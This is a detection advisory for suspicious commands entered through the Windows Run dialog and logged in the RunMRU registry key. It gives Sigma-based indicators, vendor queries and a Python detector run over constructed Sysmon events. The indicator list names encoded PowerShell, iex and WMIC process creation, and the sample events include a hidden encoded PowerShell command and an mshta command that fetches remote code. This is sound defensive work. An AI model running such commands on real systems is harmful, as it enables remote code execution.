Date: 11/04/2024
Severity: Medium
Summary
The "Potentially Suspicious Command Executed Via Run Dialog Box - Registry" alert fires when a command matching one of the indicators below is written to the RunMRU registry key. Windows keeps a per-user history of commands entered in the Run dialog (Win+R) under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU: each command is stored as a lettered value (a, b, c, ...) and an MRUList value records their order. Sysmon logs each such write as Event ID 13 (RegistryEvent: Value Set), with the key path in TargetObject and the command text in Details. A RunMRU entry containing a PowerShell invocation, an encoded command, a URL, or WMIC process creation typically indicates interactive activity by a user or by an attacker with console or RDP access, since automated malware rarely goes through the Run dialog; for most end users the Run dialog is used rarely enough that hits can be triaged quickly. The indicators below are taken from the referenced Sigma rule and are matched as case-insensitive substrings of the Details field.
Indicators of Compromise (IOC) List
TargetObject | contains '\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' |
Details | contains any of: 'powershell' 'pwsh' ' -e ' ' -ec ' ' -en ' ' -enc ' ' -enco' 'ftp' 'Hidden' 'http' 'iex' 'Invoke-' 'wmic' 'shadowcopy' 'process call create' |
Note: the spaces inside ' -e ', ' -ec ', ' -en ' and ' -enc ' are part of the indicator; they are what keeps '-e' from matching arbitrary arguments such as '-energy'. Both fields are compared as case-insensitive substrings, as in the Sigma rule, because Sysmon reports TargetObject with the full hive and SID prefix (for example HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a) and Details as the command followed by a literal '\1' suffix.
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 | resourcename in ("Sysmon") AND eventtype = "13" AND targetObject = "\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" AND (details in ("powershell","pwsh","-e","-ec","-en","-enc","-enco","ftp","Hidden","http","iex","Invoke-") OR details in ("wmic","shadowcopy","process call create")) |
Detection Query 2 | Technologygroup = "EDR" AND targetObject = "\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" AND (details in ("powershell","pwsh","-e","-ec","-en","-enc","-enco","ftp","Hidden","http","iex","Invoke-") OR details in ("wmic","shadowcopy","process call create")) |
Caveat: as written, both queries compare targetObject for equality and list the '-e' family without its surrounding spaces. The referenced Sigma rule uses case-insensitive substring (contains) matching on both fields, and the Sysmon TargetObject carries a hive and SID prefix and a trailing value name, so confirm that the platform's "=" and "in" operators perform substring matches on these fields before deploying; with exact matching the rule will not fire, and with substring matching but the spaces dropped, "-e" and "-en" will match many benign command-line arguments.
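The detection logic applied to sample telemetry, as an added example (this is not Gurucul's or SigmaHQ's code): it implements the referenced Sigma rule's conditions (Event ID 13, TargetObject contains the RunMRU path, Details contains any indicator, all case-insensitive substring matches) over constructed Sysmon records. The SysmonRegistryEvent field names, the SID, and the sample commands are assumptions made here; the exclusion of the MRUList value is an addition of mine and is not part of the Sigma rule.

```python
# Added example (not Gurucul's or SigmaHQ's code): the RunMRU detection logic
# from the referenced Sigma rule, run over constructed Sysmon Event ID 13 records.
from dataclasses import dataclass
from typing import List, Optional, Tuple

RUNMRU_PATH = r"\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Indicator substrings from the page's IOC list. The spaces around the "-e"
# family are part of the indicator: a bare "-e" would also match harmless
# arguments such as "-energy".
SUSPICIOUS_DETAILS = (
    "powershell", "pwsh",
    " -e ", " -ec ", " -en ", " -enc ", " -enco",
    "ftp", "Hidden", "http", "iex", "Invoke-",
    "wmic", "shadowcopy", "process call create",
)


@dataclass
class SysmonRegistryEvent:
    """Minimal view of a Sysmon registry event (field names assumed here)."""
    event_id: int
    target_object: str   # e.g. HKU\<SID>\SOFTWARE\...\Explorer\RunMRU\a
    details: str         # value data; the Run dialog stores "<command>\1"


def run_command(details: str) -> str:
    """Strip the literal '\\1' suffix the Run dialog appends to each entry."""
    return details[:-2] if details.endswith("\\1") else details


def match_runmru(ev: SysmonRegistryEvent) -> Optional[str]:
    """Return the first indicator that fires, or None.

    Mirrors the Sigma rule: EventID 13 (value set), TargetObject contains the
    RunMRU path, Details contains any indicator. Comparisons are lower-cased,
    matching Sigma's default case-insensitive string matching.
    """
    if ev.event_id != 13:
        return None
    target = ev.target_object.lower()
    if RUNMRU_PATH.lower() not in target:
        return None
    # Assumption added here, not in the Sigma rule: the MRUList value only
    # records the order of the lettered values (e.g. "edcba"), never a command.
    if target.endswith("\\mrulist"):
        return None
    details = ev.details.lower()
    for ioc in SUSPICIOUS_DETAILS:
        if ioc.lower() in details:
            return ioc
    return None


def scan(events: List[SysmonRegistryEvent]) -> List[Tuple[str, str, str]]:
    """Return (value path, command, indicator) for each event that fires."""
    hits = []
    for ev in events:
        ioc = match_runmru(ev)
        if ioc is not None:
            hits.append((ev.target_object, run_command(ev.details), ioc))
    return hits


# Constructed sample events (not real telemetry); the SID is made up.
_KEY = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\SOFTWARE" + RUNMRU_PATH
SAMPLE_EVENTS = [
    SysmonRegistryEvent(13, _KEY + r"\a", r"powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA\1"),
    SysmonRegistryEvent(13, _KEY + r"\b", r"cmd\1"),
    SysmonRegistryEvent(13, _KEY + r"\c", r"mshta http://203.0.113.10/update.hta\1"),
    SysmonRegistryEvent(13, _KEY + r"\d", r"wmic process call create notepad\1"),
    SysmonRegistryEvent(13, _KEY + r"\e", r"powercfg -energy\1"),   # " -en " does not match "-energy"
    SysmonRegistryEvent(13, _KEY + r"\MRUList", "edcba"),           # ordering value, skipped
    SysmonRegistryEvent(12, _KEY, ""),                               # key created, not a value set
]

if __name__ == "__main__":
    for path, cmd, ioc in scan(SAMPLE_EVENTS):
        print(f"ALERT {path}: {cmd!r} (indicator {ioc!r})")
```

Running the block reports three hits (the encoded PowerShell, the mshta URL, and the WMIC process creation) and stays silent on cmd, on powercfg -energy, on the MRUList write and on the key-creation event, which is the behaviour to reproduce when porting the rule to a platform whose "in" or "=" operator is not a substring match.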
Reference:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml